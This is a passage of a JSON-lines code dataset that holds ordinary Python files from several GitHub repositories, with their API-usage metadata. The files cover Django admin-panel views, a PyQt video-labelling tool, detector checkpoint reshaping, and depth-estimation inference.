('PRIMER3_PATH', PRIMER3_PATH),\n ('PRIMER3_INPUT_DIR', PRIMER3_INPUT_DIR),\n ('PRIMER3_OUTPUT_DIR', PRIMER3_OUTPUT_DIR),\n ('PROBE_SEQUENCE_PATH', PROBE_SEQUENCE_PATH),\n]\n\nfor DIR in (PRIMER3_INPUT_DIR, PRIMER3_OUTPUT_DIR):\n if not os.path.exists(DIR):\n try:\n os.mkdir(DIR)\n except Exception:\n raise FileNotFoundError(\n 'Failed to create primer3 directory at '\n + DIR\n )\n\nfor name, path in PATHS:\n assert os.path.exists(path), (\n f\"Path not found at settings.{name}:\"\n + f\" { path }\"\n )\n", "repo_name": "neoformit/primerdesign", "sub_path": "primerdesign/project_paths.py", "file_name": "project_paths.py", "file_ext": "py", "file_size_in_byte": 1267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pathlib.Path", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}]} +{"seq_id": "40435431258", "text": "import json\n\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.utils.safestring import mark_safe\n\nfrom .models import Fruit, Wallet, ChatMessage, TaskTime\nfrom .forms import LoginForm\nfrom .tasks import parserJoke\n\n\ndef login_user(request):\n if request.user.is_authenticated:\n return redirect('room')\n\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n username = User.objects.filter(email=cd['email']).first()\n if username is None:\n return redirect('login')\n\n user = authenticate(username=username, password=cd['password'])\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('room')\n else:\n return redirect('login')\n else:\n form = LoginForm()\n return render(request, 'admin_panel/login.html', {'form': form})\n\n\ndef logout_user(request):\n logout(request)\n return redirect('login')\n\n\ndef index(request):\n return render(request, 'admin_panel/index.html')\n\n\ndef warehouse(request):\n fruits = Fruit.objects.all()\n room_name = 'warehouse'\n\n parserJoke.delay()\n message_list = ChatMessage.objects.all()[:40]\n messages = []\n for obj in message_list:\n messages.insert(0, obj)\n\n data = {\n 'object_list': fruits,\n 'wallet': Wallet.objects.get(pk=1),\n 'room_name_json': mark_safe(json.dumps(room_name)),\n 'messages': messages\n }\n return render(request, 'admin_panel/warehouse.html', data)\n\n\ndef ajax_select_log(request):\n logs = TaskTime.objects.all()\n return render(request, 'admin_panel/ajax/select_log.html', {'logs': logs})", "repo_name": "Rur1k/FruitCompany", "sub_path": "admin_panel/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1881, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.redirect", "line_number": 15, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 21, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Fruit.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Fruit.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Fruit", "line_number": 47, "usage_type": "name"}, {"api_name": "tasks.parserJoke.delay", "line_number": 50, "usage_type": "call"}, {"api_name": "tasks.parserJoke", "line_number": 50, "usage_type": "name"}, {"api_name": "models.ChatMessage.objects.all", "line_number": 51, "usage_type": "call"}, {"api_name": "models.ChatMessage.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.ChatMessage", "line_number": 51, "usage_type": "name"}, {"api_name": "models.Wallet.objects.get", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Wallet.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Wallet", "line_number": 58, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 59, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "models.TaskTime.objects.all", "line_number": 66, "usage_type": "call"}, {"api_name": "models.TaskTime.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.TaskTime", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "38882526651", "text": "import argparse\nimport os\n\nimport torch\nfrom mmcv.runner.utils import set_random_seed\n\n# VOC config\nNEU_TAR_SIZE = 6\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n # Paths\n parser.add_argument('--src1', type=str, help='Path to the main checkpoint')\n parser.add_argument(\n '--src2',\n type=str,\n default=None,\n help='Path to the secondary checkpoint. Only used when combining '\n 'fc layers of two checkpoints')\n parser.add_argument(\n '--save-dir', type=str, default=None, help='Save directory')\n parser.add_argument(\n '--method',\n choices=['combine', 'remove', 'random_init'],\n required=True,\n help='Reshape method. combine = combine bbox heads from different '\n 'checkpoints. remove = for fine-tuning on novel dataset, remove the '\n 'final layer of the base detector. random_init = randomly initialize '\n 'novel weights.')\n parser.add_argument(\n '--param-name',\n type=str,\n nargs='+',\n default=['roi_head.bbox_head.fc_cls', 'roi_head.bbox_head.fc_reg'],\n help='Target parameter names')\n parser.add_argument(\n '--tar-name',\n type=str,\n default='base_model',\n help='Name of the new checkpoint')\n parser.add_argument('--seed', type=int, default=0, help='Random seed')\n return parser.parse_args()\n\n\ndef random_init_checkpoint(param_name, is_weight, tar_size, checkpoint, args):\n \"\"\"Either remove the final layer weights for fine-tuning on novel dataset\n or append randomly initialized weights for the novel classes.\n\n Note: The base detector for LVIS contains weights for all classes, but only\n the weights corresponding to base classes are updated during base training\n (this design choice has no particular reason). Thus, the random\n initialization step is not really necessary.\n \"\"\"\n weight_name = param_name + ('.weight' if is_weight else '.bias')\n pretrained_weight = checkpoint['state_dict'][weight_name]\n prev_cls = pretrained_weight.size(0)\n if 'fc_cls' in param_name:\n prev_cls -= 1\n if is_weight:\n feat_size = pretrained_weight.size(1)\n new_weight = torch.rand((tar_size, feat_size))\n torch.nn.init.normal_(new_weight, 0, 0.01)\n else:\n new_weight = torch.zeros(tar_size)\n new_weight[:prev_cls] = pretrained_weight[:prev_cls]\n if 'fc_cls' in param_name:\n new_weight[-1] = pretrained_weight[-1] # bg class\n checkpoint['state_dict'][weight_name] = new_weight\n\n\ndef combine_checkpoints(param_name, is_weight, tar_size, checkpoint,\n checkpoint2, args):\n \"\"\"Combine base detector with novel detector.\n\n Feature extractor weights are from the base detector. Only the final layer\n weights are combined.\n \"\"\"\n if not is_weight and param_name + '.bias' not in checkpoint['state_dict']:\n return\n if not is_weight and param_name + '.bias' not in checkpoint2['state_dict']:\n return\n weight_name = param_name + ('.weight' if is_weight else '.bias')\n pretrained_weight = checkpoint['state_dict'][weight_name]\n prev_cls = pretrained_weight.size(0)\n if 'fc_cls' in param_name:\n prev_cls -= 1\n if is_weight:\n feat_size = pretrained_weight.size(1)\n new_weight = torch.rand((tar_size, feat_size))\n else:\n new_weight = torch.zeros(tar_size)\n new_weight[:prev_cls] = pretrained_weight[:prev_cls]\n\n checkpoint2_weight = checkpoint2['state_dict'][weight_name]\n\n if 'fc_cls' in param_name:\n new_weight[prev_cls:-1] = checkpoint2_weight[:-1]\n new_weight[-1] = pretrained_weight[-1]\n else:\n new_weight[prev_cls:] = checkpoint2_weight\n checkpoint['state_dict'][weight_name] = new_weight\n return checkpoint\n\n\ndef reset_checkpoint(checkpoint):\n if 'scheduler' in checkpoint:\n del checkpoint['scheduler']\n if 'optimizer' in checkpoint:\n del checkpoint['optimizer']\n if 'iteration' in checkpoint:\n checkpoint['iteration'] = 0\n\n\ndef main():\n args = parse_args()\n set_random_seed(args.seed)\n checkpoint = torch.load(args.src1)\n save_name = args.tar_name + f'_fine-tuning.pth'\n save_dir = args.save_dir \\\n if args.save_dir != '' else os.path.dirname(args.src1)\n save_path = os.path.join(save_dir, save_name)\n os.makedirs(save_dir, exist_ok=True)\n reset_checkpoint(checkpoint)\n\n TAR_SIZE = NEU_TAR_SIZE\n\n if args.method == 'remove':\n # Remove parameters\n for param_name in args.param_name:\n del checkpoint['state_dict'][param_name + '.weight']\n if param_name + '.bias' in checkpoint['state_dict']:\n del checkpoint['state_dict'][param_name + '.bias']\n elif args.method == 'combine':\n checkpoint2 = torch.load(args.src2)\n tar_sizes = [TAR_SIZE + 1, TAR_SIZE * 4]\n for idx, (param_name,\n tar_size) in enumerate(zip(args.param_name, tar_sizes)):\n combine_checkpoints(param_name, True, tar_size, checkpoint,\n checkpoint2, args)\n combine_checkpoints(param_name, False, tar_size, checkpoint,\n checkpoint2, args)\n elif args.method == 'random_init':\n tar_sizes = [TAR_SIZE + 1, TAR_SIZE * 4]\n for idx, (param_name,\n tar_size) in enumerate(zip(args.param_name, tar_sizes)):\n random_init_checkpoint(param_name, True, tar_size, checkpoint,\n args)\n random_init_checkpoint(param_name, False, tar_size, checkpoint,\n args)\n else:\n raise ValueError(f'not support method: {args.method}')\n\n torch.save(checkpoint, save_path)\n print('save changed checkpoint to {}'.format(save_path))\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Chan-Sun/IFSDD", "sub_path": "utils/initialize_bbox_head.py", "file_name": "initialize_bbox_head.py", "file_ext": "py", "file_size_in_byte": 5880, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn.init.normal_", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 91, "usage_type": "call"}, {"api_name": "mmcv.runner.utils.set_random_seed", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 153, "usage_type": "call"}]} +{"seq_id": "4316002332", "text": "import os\nimport pathlib\nimport re\nimport sys\nimport logging\nimport time\n\nimport numpy as np\nimport pkg_resources\nfrom PyQt5.QtCore import Qt, QTimer\nfrom PyQt5.QtGui import QIcon, QImage, QPixmap\nfrom PyQt5.QtWidgets import (\n QAction,\n QApplication,\n QDesktopWidget,\n QDialog,\n QFileDialog,\n QHBoxLayout,\n QLabel,\n QMainWindow,\n QVBoxLayout,\n QWidget,\n)\n\nimport cv2\nfrom quicklabel.config import *\nfrom quicklabel.gui import quickLabelGUI\nfrom quicklabel.predictprocess import PredictProcess, Manager, Event, FASTAI\nfrom quicklabel.imagereaderprocess import ImageReaderProcess\nfrom quicklabel.labelrecorderprocess import LabelRecorderProcess\n\nFONT = cv2.FONT_HERSHEY_SIMPLEX\n\n\nclass quickLabel(quickLabelGUI):\n \"\"\"Create the main window that stores all of the widgets necessary for the application.\"\"\"\n\n def __init__(self, parent=None):\n \"\"\"Initialize the components of the main window.\"\"\"\n super(quickLabel, self).__init__(parent)\n\n self.filename = None\n self.last_label = None\n self.batch = []\n self.image_managed_dict = None\n self.managed_dict = None\n self.image_reader_process = None\n self.prediction_process = None\n self.label_recorder_process = None\n self.current_frame_number = 0\n\n def load_file(self, filename):\n self.filename = filename\n self.status_bar.showMessage(\"Video Loaded\", 5000)\n self.last_label = None\n \n if self.image_reader_process is not None:\n self.image_reader_process.stop_event.set()\n self.image_reader_process = ImageReaderProcess(self.filename)\n self.image_reader_process.start()\n self.current_frame_number = 0\n \n frame = self.image_reader_process[0]\n self.frame = frame\n self.printed_frame = frame\n self.height, self.width, self.channel = frame.shape\n self.bytesPerLine = 3 * self.width\n self.resize(self.width, self.height)\n\n if self.label_recorder_process is not None:\n self.label_recorder_process.stop_event.set()\n self.label_recorder_process = LabelRecorderProcess(self.filename)\n self.label_recorder_process.start()\n\n if self.prediction_process is not None:\n self.prediction_process.stop_event.set()\n\n if FASTAI:\n model_path = pkg_resources.resource_filename(\n \"models\", \"cnn1.pkl\"\n )\n\n self.prediction_process = PredictProcess(\n model_path, filename, self.image_reader_process)\n self.prediction_process.start()\n\n self.display_next_image()\n if len(self.batch) > 0:\n self.status_bar.showMessage(\n f\"{self.filename}. {len(self.batch)} files to go\"\n )\n else:\n self.status_bar.showMessage(f\"{self.filename}.\")\n\n def add_fast_ai_text(self, frame, label, proba):\n n = 0\n for key, val in proba.items():\n color = (100, 255, 100) if key == label else (255, 255, 255)\n cv2.putText(\n frame,\n \"{:10s}\".format(key),\n (10, self.height - 200 + n * 30),\n FONT,\n 1,\n color,\n 2,\n cv2.LINE_AA,\n )\n cv2.putText(\n frame,\n \": {:.2f}\".format(val),\n (150, self.height - 200 + n * 30),\n FONT,\n 1,\n color,\n 2,\n cv2.LINE_AA,\n )\n n += 1\n\n return frame\n\n def display_next_image(self):\n # Capture frame-by-frame\n frame = self.image_reader_process[self.current_frame_number]\n self.frame = np.copy(frame)\n if frame is None:\n return False\n\n if (\n FASTAI\n and self.current_frame_number in self.prediction_process.managed_dict.keys()\n ):\n label, proba = self.prediction_process.managed_dict[\n self.current_frame_number\n ]\n self.add_fast_ai_text(frame, label, proba)\n\n cv2.putText(\n frame,\n self.last_label,\n (10, self.height - 10),\n FONT,\n 4,\n (255, 255, 255),\n 3,\n cv2.LINE_AA,\n )\n cv2.putText(\n frame,\n str(self.current_frame_number) + \"/\" + str(len(self.image_reader_process)),\n (self.width - 250, self.height - 10),\n FONT,\n 1,\n (255, 255, 255),\n 2,\n cv2.LINE_AA,\n )\n\n\n\n self.printed_frame = frame\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n qImg = QImage(\n frame.data, self.width, self.height, self.bytesPerLine, QImage.Format_RGB888\n )\n pixmap = QPixmap.fromImage(qImg)\n self.label.setPixmap(pixmap)\n self.current_frame_number += 1\n\n return True\n\n\n def predict_on_video(self, filename):\n self.status_bar.showMessage(\"Predicting Only\")\n self.load_file(filename)\n fourcc = cv2.VideoWriter_fourcc(*'DIVX')\n self.out = cv2.VideoWriter('output.avi',fourcc, 24.0, (self.width, self.height)) \n self.i = 0\n self.predict_next_timer()\n\n def predict_next_timer(self):\n if self.i+1 in self.prediction_process.managed_dict.keys() or self.prediction_process.finished:\n if self.display_next_image():\n self.out.write(self.printed_frame)\n logging.debug(\"Writing\")\n self.i += 1\n QTimer.singleShot(10, self.predict_next_timer)\n else:\n self.out.release()\n self.status_bar.showMessage(\"Done!\")\n else:\n logging.debug('Waiting for image {} to be processed'.format(self.i))\n QTimer.singleShot(1000, self.predict_next_timer)\n\n\n\n def record_label_to_file(self):\n \"\"\"Open a QFileDialog to allow the user to open a file into the application.\"\"\"\n filename, accepted = QFileDialog.getOpenFileName(self, \"Open File\")\n if accepted:\n self.write_labels_to_file(filename)\n\n def write_labels_to_file(self, filename):\n path = pathlib.Path(filename)\n path.parent.joinpath(\"label\").mkdir(exist_ok=True)\n path = path.parent.joinpath(\"label\") / (path.stem + \".txt\")\n\n with open(path, \"w\") as f:\n f.write(\"Frame, Label\\n\")\n labels = []\n for file in path.parent.glob(path.stem + \"*.jpeg\"):\n labels.append(\n re.search(r\"_frame_(\\d*)_label_(.*)\\.jpeg\", str(file)).groups()\n )\n labels[-1] = (int(labels[-1][0]), labels[-1][1])\n labels = sorted(labels, key=lambda tup: tup[0])\n f.writelines([str(x) + \",\" + y + \"\\n\" for x, y in labels])\n\n def keyPressEvent(self, e):\n if self.filename is not None:\n label = None\n if e.key() == Qt.Key_Backspace:\n self.current_frame_number -= 2\n self.current_frame_number = max(0, self.current_frame_number)\n self.last_label = None\n self.display_next_image()\n return\n\n if e.key() == Qt.Key_F:\n label = \"Fight\"\n if e.key() == Qt.Key_S:\n label = \"Stealth\"\n if e.key() == Qt.Key_E:\n label = \"Explore\"\n if e.key() == Qt.Key_O:\n label = \"Other\"\n\n if label is not None:\n self.last_label = label\n self.label_recorder_process.record(\n frame_number=self.current_frame_number,\n label=label,\n frame=self.frame,\n )\n\n if not self.display_next_image():\n # Video ended\n self.write_labels_to_file(self.filename)\n self.status_bar.showMessage(\"VideoEnded\")\n self.filename = None\n if FASTAI:\n self.prediction_process.stop_event.set()\n if len(self.batch) > 0:\n self.load_file(self.batch.pop())\n\n def closeEvent(self, event):\n for proc in [self.image_reader_process, self.prediction_process, self.label_recorder_process]:\n if proc is not None:\n proc.stop_event.set()\n proc.join()\n\n\ndef main():\n application = QApplication(sys.argv)\n window = quickLabel()\n desktop = QDesktopWidget().availableGeometry()\n width = (desktop.width() - window.width()) / 2\n height = (desktop.height() - window.height()) / 2\n window.show()\n window.move(width, height)\n sys.exit(application.exec_())\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n main()\n", "repo_name": "alexisfcote/QuickLabel", "sub_path": "quicklabel/quicklabel.py", "file_name": "quicklabel.py", "file_ext": "py", "file_size_in_byte": 8943, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 32, "usage_type": "attribute"}, {"api_name": "quicklabel.gui.quickLabelGUI", "line_number": 35, "usage_type": "name"}, {"api_name": "quicklabel.imagereaderprocess.ImageReaderProcess", "line_number": 59, "usage_type": "call"}, {"api_name": "quicklabel.labelrecorderprocess.LabelRecorderProcess", "line_number": 72, "usage_type": "call"}, {"api_name": "quicklabel.predictprocess.FASTAI", "line_number": 78, "usage_type": "name"}, {"api_name": "pkg_resources.resource_filename", "line_number": 79, "usage_type": "call"}, {"api_name": "quicklabel.predictprocess.PredictProcess", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 99, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 107, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 126, "usage_type": "call"}, {"api_name": "quicklabel.predictprocess.FASTAI", "line_number": 131, "usage_type": "name"}, {"api_name": "cv2.putText", "line_number": 139, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 147, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 157, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 163, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 163, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 165, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_RGB888", "line_number": 166, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 166, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 168, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 168, "usage_type": "name"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 178, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 179, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 187, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 189, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 189, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 194, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 195, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 195, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 201, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 201, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 206, "usage_type": "call"}, {"api_name": "re.search", "line_number": 215, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.Key_Backspace", "line_number": 224, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 224, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Key_F", "line_number": 231, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 231, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Key_S", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 233, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Key_E", "line_number": 235, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 235, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Key_O", "line_number": 237, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 237, "usage_type": "name"}, {"api_name": "quicklabel.predictprocess.FASTAI", "line_number": 253, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 266, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 266, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QDesktopWidget", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 273, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 277, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 277, "usage_type": "attribute"}]} +{"seq_id": "13283130894", "text": "import cv2\nfrom PIL import Image\nimport os\nimport sys\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nfrom torchvision import transforms \nfrom bts import *\nimport utils\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu') \n\nclass DepthEstimation:\n def __init__(self, args):\n self.args = args\n \n def preprocess(self, image, gt_depth, gt_mask):\n assert isinstance(image, np.ndarray) , 'image must be np array'\n \n if self.dataset == 'diode':\n focal = Variable(torch.tensor([886.81])).to(device)\n if isinstance(gt_depth, np.ndarray):\n gt_depth = utils.add_mask(gt_depth, gt_mask)\n gt_depth = gt_depth * 1000\n gt_depth = cv2.resize(gt_depth, (self.args.width, self.args.height), cv2.INTER_NEAREST)\n else: \n gt_depth = None\n\n elif self.dataset == 'realsense':\n focal = Variable(torch.tensor([886.81])).to(device)\n if isinstance(gt_depth, np.ndarray):\n gt_depth[gt_depth > 9000] = 0\n gt_depth = gt_depth[45:472, 43:608] # crop dude to depth image pixel registration\n gt_depth = cv2.resize(gt_depth, (self.args.width, self.args.height), cv2.INTER_NEAREST)\n else: \n gt_depth = None\n image = image[45:472, 43:608]\n \n elif self.dataset == 'nyu':\n focal = Variable(torch.tensor([518.8579])).to(device)\n if isinstance(gt_depth, np.ndarray):\n gt_depth = gt_depth[45:472, 43:608]\n gt_depth = cv2.resize(gt_depth, (self.args.width, self.args.height), cv2.INTER_NEAREST)\n else: \n gt_depth = None\n \n elif self.dataset == 'kitti':\n focal = Variable(torch.tensor([715.0873])).to(device)\n \n image = cv2.resize(image, (self.args.width, self.args.height), cv2.INTER_NEAREST) \n return image, gt_depth, focal\n \n def post_process(self, pred_depth):\n if self.dataset == 'kitti':\n pred_depth = pred_depth.cpu().numpy().squeeze() * 256\n else:\n pred_depth = pred_depth.cpu().numpy().squeeze() * 1000\n colormap = cv2.applyColorMap(cv2.convertScaleAbs(pred_depth, alpha=0.0355), cv2.COLORMAP_JET)[...,::-1]\n\n return pred_depth, colormap\n \n def predict(self, model, image, gt_depth, dataset = 'realsense', gt_mask= None):\n self.dataset = dataset\n image, gt_depth, focal = self.preprocess(image, gt_depth, gt_mask)\n to_tensor = transforms.Compose([\n transforms.ToTensor(), \n transforms.Normalize([0.3947, 0.3610, 0.3366], [0.1965, 0.1943, 0.2006])\n ])\n tensor_img = to_tensor(Image.fromarray(image)).unsqueeze(0).to(device)\n *_, pred_depth = model(tensor_img, focal)\n pred_depth, colormap = self.post_process(pred_depth)\n \n return pred_depth, colormap\n \n def load_model(self, args): \n model_dir = os.path.dirname(args.model_path)\n sys.path.append(model_dir)\n model = BtsModel(args)\n model = torch.nn.DataParallel(model)\n checkpoint = torch.load(args.checkpoint)\n model.load_state_dict(checkpoint['model'])\n model.eval()\n model.to(device)\n \n return model\n \n ", "repo_name": "Elliot-ZM/my_projects", "sub_path": "depth_estimation/depth_estimation.py", "file_name": "depth_estimation.py", "file_ext": "py", "file_size_in_byte": 3394, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torch.device", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 22, "usage_type": "attribute"}, {"api_name": "utils.add_mask", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cv2.applyColorMap", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.convertScaleAbs", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.COLORMAP_JET", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 65, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 65, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 66, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 66, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 67, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 67, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 77, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torch.nn.DataParallel", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 80, 